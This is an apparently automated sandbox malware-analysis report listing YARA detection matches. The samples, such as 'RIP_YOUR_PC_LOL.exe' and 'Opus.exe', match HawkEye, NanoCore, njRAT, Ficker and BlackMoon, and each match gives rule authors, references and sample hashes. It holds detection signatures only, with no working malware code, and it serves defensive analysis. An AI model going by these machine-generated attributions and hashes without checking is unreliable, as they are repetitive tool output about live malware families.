                    Source: 5.0.Pluto Panel.exe.f10000.0.unpack, type: UNPACKEDPEMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                    Source: 5.0.Pluto Panel.exe.f10000.0.unpack, type: UNPACKEDPEMatched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
                    Source: 5.0.Pluto Panel.exe.f10000.0.unpack, type: UNPACKEDPEMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                    Source: 4.0.healastounding.exe.935129.1.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NjRAT author = ditekSHen, description = Detects NjRAT / Bladabindi
                    Source: 4.0.healastounding.exe.935129.1.raw.unpack, type: UNPACKEDPEMatched rule: njrat1 date = 2015-05-27, author = Brian Wallace @botnet_hunter, description = Identify njRat, author_email = bwall@ballastsecurity.net
                    Source: 0.0.RIP_YOUR_PC_LOL.exe.206ac1d.13.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse author = ditekSHen, description = Detects file containing reversed ASEP Autorun registry keys
                    Source: 5.0.Pluto Panel.exe.f19c0d.3.raw.unpack, type: UNPACKEDPEMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                    Source: 5.0.Pluto Panel.exe.f19c0d.3.raw.unpack, type: UNPACKEDPEMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                    Source: 11.0.22.exe.530edf.11.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_BlackMoon author = ditekSHen, description = Detects executables using BlackMoon RunTime
                    Source: 15.0.0fd7de5367376231a788872005d7ed4f.exe.400000.19.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_Ficker author = ditekSHen, description = Detects Ficker infostealer, clamav_sig = MALWARE.Win.Trojan.Ficker
                    Source: 15.0.0fd7de5367376231a788872005d7ed4f.exe.400000.14.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_Ficker author = ditekSHen, description = Detects Ficker infostealer, clamav_sig = MALWARE.Win.Trojan.Ficker
                    Source: 9.2.Opus.exe.5b04629.6.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
                    Source: 9.2.Opus.exe.5b04629.6.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
                    Source: 9.2.Opus.exe.5b04629.6.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
                    Source: 15.2.0fd7de5367376231a788872005d7ed4f.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_Ficker author = ditekSHen, description = Detects Ficker infostealer, clamav_sig = MALWARE.Win.Trojan.Ficker
                    Source: 0.0.RIP_YOUR_PC_LOL.exe.9f86e6.3.raw.unpack, type: UNPACKEDPEMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                    Source: 0.0.RIP_YOUR_PC_LOL.exe.9f86e6.3.raw.unpack, type: UNPACKEDPEMatched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
                    Source: 0.0.RIP_YOUR_PC_LOL.exe.9f86e6.3.raw.unpack, type: UNPACKEDPEMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                    Source: 0.3.RIP_YOUR_PC_LOL.exe.59c8085.4.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse author = ditekSHen, description = Detects file containing reversed ASEP Autorun registry keys
                    Source: 7.2.0fd7de5367376231a788872005d7ed4f.exe.24f15a0.1.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_Ficker author = ditekSHen, description = Detects Ficker infostealer, clamav_sig = MALWARE.Win.Trojan.Ficker
                    Source: 0.2.RIP_YOUR_PC_LOL.exe.9f22de.3.unpack, type: UNPACKEDPEMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                    Source: 0.2.RIP_YOUR_PC_LOL.exe.9f22de.3.unpack, type: UNPACKEDPEMatched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
                    Source: 0.2.RIP_YOUR_PC_LOL.exe.9f22de.3.unpack, type: UNPACKEDPEMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                    Source: 17.0.mediaget.exe.ab0000.2.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NjRAT author = ditekSHen, description = Detects NjRAT / Bladabindi
                    Source: 17.0.mediaget.exe.ab0000.2.unpack, type: UNPACKEDPEMatched rule: njrat1 date = 2015-05-27, author = Brian Wallace @botnet_hunter, description = Identify njRat, author_email = bwall@ballastsecurity.net
                    Source: 8.0.gay.exe.d0000.3.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NjRAT author = ditekSHen, description = Detects NjRAT / Bladabindi
                    Source: 8.0.gay.exe.d0000.3.unpack, type: UNPACKEDPEMatched rule: njrat1 date = 2015-05-27, author = Brian Wallace @botnet_hunter, description = Identify njRat, author_email = bwall@ballastsecurity.net
                    Source: 4.0.healastounding.exe.902324.6.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
                    Source: 4.0.healastounding.exe.902324.6.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
                    Source: 4.0.healastounding.exe.902324.6.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
                    Source: 4.0.healastounding.exe.902324.6.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
                    Source: 9.0.Opus.exe.840000.2.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
                    Source: 9.0.Opus.exe.840000.2.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
                    Source: 9.0.Opus.exe.840000.2.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
                    Source: 9.0.Opus.exe.840000.2.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
                    Source: 4.2.healastounding.exe.3479694.5.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse author = ditekSHen, description = Detects file containing reversed ASEP Autorun registry keys
                    Source: 5.0.Pluto Panel.exe.f18208.14.raw.unpack, type: UNPACKEDPEMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                    Source: 5.0.Pluto Panel.exe.f18208.14.raw.unpack, type: UNPACKEDPEMatched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
                    Source: 5.0.Pluto Panel.exe.f18208.14.raw.unpack, type: UNPACKEDPEMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                    Source: 4.0.healastounding.exe.902324.14.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
                    Source: 4.0.healastounding.exe.902324.14.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
                    Source: 4.0.healastounding.exe.902324.14.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
                    Source: 4.0.healastounding.exe.902324.14.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
                    Source: 6.0.test.exe.da0000.1.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse author = ditekSHen, description = Detects file containing reversed ASEP Autorun registry keys
                    Source: 4.0.healastounding.exe.95312e.13.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NjRAT author = ditekSHen, description = Detects NjRAT / Bladabindi
                    Source: 4.0.healastounding.exe.95312e.13.raw.unpack, type: UNPACKEDPEMatched rule: njrat1 date = 2015-05-27, author = Brian Wallace @botnet_hunter, description = Identify njRat, author_email = bwall@ballastsecurity.net
                    Source: 0.2.RIP_YOUR_PC_LOL.exe.9f86e6.1.raw.unpack, type: UNPACKEDPEMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                    Source: 0.2.RIP_YOUR_PC_LOL.exe.9f86e6.1.raw.unpack, type: UNPACKEDPEMatched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
                    Source: 0.2.RIP_YOUR_PC_LOL.exe.9f86e6.1.raw.unpack, type: UNPACKEDPEMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                    Source: 0.3.RIP_YOUR_PC_LOL.exe.5725596.2.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NjRAT author = ditekSHen, description = Detects NjRAT / Bladabindi
                    Source: 0.3.RIP_YOUR_PC_LOL.exe.5725596.2.raw.unpack, type: UNPACKEDPEMatched rule: njrat1 date = 2015-05-27, author = Brian Wallace @botnet_hunter, description = Identify njRat, author_email = bwall@ballastsecurity.net
                    Source: 4.0.healastounding.exe.900000.12.unpack, type: UNPACKEDPE, Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
                    Source: 4.0.healastounding.exe.900000.12.unpack, type: UNPACKEDPE, Matched rule: MALWARE_Win_NjRAT author = ditekSHen, description = Detects NjRAT / Bladabindi
                    Source: 4.0.healastounding.exe.900000.12.unpack, type: UNPACKEDPE, Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
                    Source: 4.0.healastounding.exe.900000.12.unpack, type: UNPACKEDPE, Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
                    Source: 4.0.healastounding.exe.900000.12.unpack, type: UNPACKEDPE, Matched rule: njrat1 date = 2015-05-27, author = Brian Wallace @botnet_hunter, description = Identify njRat, author_email = bwall@ballastsecurity.net
                    Source: 4.0.healastounding.exe.935129.9.raw.unpack, type: UNPACKEDPE, Matched rule: MALWARE_Win_NjRAT author = ditekSHen, description = Detects NjRAT / Bladabindi
                    Source: 4.0.healastounding.exe.935129.9.raw.unpack, type: UNPACKEDPE, Matched rule: njrat1 date = 2015-05-27, author = Brian Wallace @botnet_hunter, description = Identify njRat, author_email = bwall@ballastsecurity.net
                    Source: 0.3.RIP_YOUR_PC_LOL.exe.596a627.9.unpack, type: UNPACKEDPE, Matched rule: MALWARE_Win_BlackMoon author = ditekSHen, description = Detects executables using BlackMoon RunTime
                    Source: 0.0.RIP_YOUR_PC_LOL.exe.1ce97c4.11.raw.unpack, type: UNPACKEDPE, Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
                    Source: 0.0.RIP_YOUR_PC_LOL.exe.1ce97c4.11.raw.unpack, type: UNPACKEDPE, Matched rule: MALWARE_Win_NjRAT author = ditekSHen, description = Detects NjRAT / Bladabindi
                    Source: 0.0.RIP_YOUR_PC_LOL.exe.1ce97c4.11.raw.unpack, type: UNPACKEDPE, Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
                    Source: 0.0.RIP_YOUR_PC_LOL.exe.1ce97c4.11.raw.unpack, type: UNPACKEDPE, Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
                    Source: 0.0.RIP_YOUR_PC_LOL.exe.1ce97c4.11.raw.unpack, type: UNPACKEDPE, Matched rule: njrat1 date = 2015-05-27, author = Brian Wallace @botnet_hunter, description = Identify njRat, author_email = bwall@ballastsecurity.net
                    Source: 0.1.RIP_YOUR_PC_LOL.exe.c8867b.3.unpack, type: UNPACKEDPE, Matched rule: MALWARE_Win_BlackMoon author = ditekSHen, description = Detects executables using BlackMoon RunTime
                    Source: 0.1.RIP_YOUR_PC_LOL.exe.9f86e6.0.raw.unpack, type: UNPACKEDPE, Matched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                    Source: 0.1.RIP_YOUR_PC_LOL.exe.9f86e6.0.raw.unpack, type: UNPACKEDPE, Matched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
                    Source: 0.1.RIP_YOUR_PC_LOL.exe.9f86e6.0.raw.unpack, type: UNPACKEDPE, Matched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                    Source: 0.2.RIP_YOUR_PC_LOL.exe.1ce97c4.11.unpack, type: UNPACKEDPE, Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
                    Source: 0.2.RIP_YOUR_PC_LOL.exe.1ce97c4.11.unpack, type: UNPACKEDPE, Matched rule: MALWARE_Win_NjRAT author = ditekSHen, description = Detects NjRAT / Bladabindi
                    Source: 0.2.RIP_YOUR_PC_LOL.exe.1ce97c4.11.unpack, type: UNPACKEDPE, Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
                    Source: 0.2.RIP_YOUR_PC_LOL.exe.1ce97c4.11.unpack, type: UNPACKEDPE, Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
                    Source: 0.2.RIP_YOUR_PC_LOL.exe.1ce97c4.11.unpack, type: UNPACKEDPE, Matched rule: njrat1 date = 2015-05-27, author = Brian Wallace @botnet_hunter, description = Identify njRat, author_email = bwall@ballastsecurity.net
                    Source: 4.0.healastounding.exe.902324.3.raw.unpack, type: UNPACKEDPE, Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
                    Source: 4.0.healastounding.exe.902324.3.raw.unpack, type: UNPACKEDPE, Matched rule: MALWARE_Win_NjRAT author = ditekSHen, description = Detects NjRAT / Bladabindi
                    Source: 4.0.healastounding.exe.902324.3.raw.unpack, type: UNPACKEDPE, Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
                    Source: 4.0.healastounding.exe.902324.3.raw.unpack, type: UNPACKEDPE, Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
                    Source: 4.0.healastounding.exe.902324.3.raw.unpack, type: UNPACKEDPE, Matched rule: njrat1 date = 2015-05-27, author = Brian Wallace @botnet_hunter, description = Identify njRat, author_email = bwall@ballastsecurity.net
                    Source: 0.0.RIP_YOUR_PC_LOL.exe.1ce97c4.11.unpack, type: UNPACKEDPE, Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
                    Source: 0.0.RIP_YOUR_PC_LOL.exe.1ce97c4.11.unpack, type: UNPACKEDPE, Matched rule: MALWARE_Win_NjRAT author = ditekSHen, description = Detects NjRAT / Bladabindi
                    Source: 0.0.RIP_YOUR_PC_LOL.exe.1ce97c4.11.unpack, type: UNPACKEDPE, Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
                    Source: 0.0.RIP_YOUR_PC_LOL.exe.1ce97c4.11.unpack, type: UNPACKEDPE, Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
                    Source: 0.0.RIP_YOUR_PC_LOL.exe.1ce97c4.11.unpack, type: UNPACKEDPE, Matched rule: njrat1 date = 2015-05-27, author = Brian Wallace @botnet_hunter, description = Identify njRat, author_email = bwall@ballastsecurity.net
                    Source: 11.0.22.exe.530edf.4.unpack, type: UNPACKEDPE, Matched rule: MALWARE_Win_BlackMoon author = ditekSHen, description = Detects executables using BlackMoon RunTime
                    Source: 4.0.healastounding.exe.95312e.2.raw.unpack, type: UNPACKEDPE, Matched rule: MALWARE_Win_NjRAT author = ditekSHen, description = Detects NjRAT / Bladabindi
                    Source: 4.0.healastounding.exe.95312e.2.raw.unpack, type: UNPACKEDPE, Matched rule: njrat1 date = 2015-05-27, author = Brian Wallace @botnet_hunter, description = Identify njRat, author_email = bwall@ballastsecurity.net
                    Source: 4.0.healastounding.exe.900000.8.unpack, type: UNPACKEDPE, Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
                    Source: 4.0.healastounding.exe.900000.8.unpack, type: UNPACKEDPE, Matched rule: MALWARE_Win_NjRAT author = ditekSHen, description = Detects NjRAT / Bladabindi
                    Source: 4.0.healastounding.exe.900000.8.unpack, type: UNPACKEDPE, Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
                    Source: 4.0.healastounding.exe.900000.8.unpack, type: UNPACKEDPE, Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
                    Source: 4.0.healastounding.exe.900000.8.unpack, type: UNPACKEDPE, Matched rule: njrat1 date = 2015-05-27, author = Brian Wallace @botnet_hunter, description = Identify njRat, author_email = bwall@ballastsecurity.net
                    Source: 5.2.Pluto Panel.exe.3706aac.5.raw.unpack, type: UNPACKEDPE, Matched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
                    Source: 0.0.RIP_YOUR_PC_LOL.exe.ea57bf.9.unpack, type: UNPACKEDPE, Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
                    Source: 0.0.RIP_YOUR_PC_LOL.exe.ea57bf.9.unpack, type: UNPACKEDPE, Matched rule: MALWARE_Win_NjRAT author = ditekSHen, description = Detects NjRAT / Bladabindi
                    Source: 0.0.RIP_YOUR_PC_LOL.exe.ea57bf.9.unpack, type: UNPACKEDPE, Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
                    Source: 0.0.RIP_YOUR_PC_LOL.exe.ea57bf.9.unpack, type: UNPACKEDPE, Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
                    Source: 0.0.RIP_YOUR_PC_LOL.exe.ea57bf.9.unpack, type: UNPACKEDPE, Matched rule: njrat1 date = 2015-05-27, author = Brian Wallace @botnet_hunter, description = Identify njRat, author_email = bwall@ballastsecurity.net
                    Source: 0.2.RIP_YOUR_PC_LOL.exe.ea57bf.9.unpack, type: UNPACKEDPE, Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
                    Source: 0.2.RIP_YOUR_PC_LOL.exe.ea57bf.9.unpack, type: UNPACKEDPE, Matched rule: MALWARE_Win_NjRAT author = ditekSHen, description = Detects NjRAT / Bladabindi
                    Source: 0.2.RIP_YOUR_PC_LOL.exe.ea57bf.9.unpack, type: UNPACKEDPE, Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
                    Source: 0.2.RIP_YOUR_PC_LOL.exe.ea57bf.9.unpack, type: UNPACKEDPE, Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
                    Source: 0.2.RIP_YOUR_PC_LOL.exe.ea57bf.9.unpack, type: UNPACKEDPE, Matched rule: njrat1 date = 2015-05-27, author = Brian Wallace @botnet_hunter, description = Identify njRat, author_email = bwall@ballastsecurity.net
                    Source: 00000009.00000000.414257385.0000000000842000.00000002.00000001.01000000.0000000A.sdmp, type: MEMORY, Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
                    Source: 00000009.00000000.414257385.0000000000842000.00000002.00000001.01000000.0000000A.sdmp, type: MEMORY, Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
                    Source: 00000006.00000000.397644420.0000000000DA2000.00000002.00000001.01000000.00000007.sdmp, type: MEMORY, Matched rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse author = ditekSHen, description = Detects file containing reversed ASEP Autorun registry keys
                    Source: 00000009.00000002.707363158.0000000003ECB000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY, Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
                    Source: 00000008.00000000.411478373.00000000000D2000.00000002.00000001.01000000.00000009.sdmp, type: MEMORY, Matched rule: njrat1 date = 2015-05-27, author = Brian Wallace @botnet_hunter, description = Identify njRat, author_email = bwall@ballastsecurity.net
                    Source: 00000009.00000000.414807841.0000000000842000.00000002.00000001.01000000.0000000A.sdmp, type: MEMORY, Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
                    Source: 00000009.00000000.414807841.0000000000842000.00000002.00000001.01000000.0000000A.sdmp, type: MEMORY, Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
                    Source: 00000009.00000000.416456851.0000000000842000.00000002.00000001.01000000.0000000A.sdmp, type: MEMORY, Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
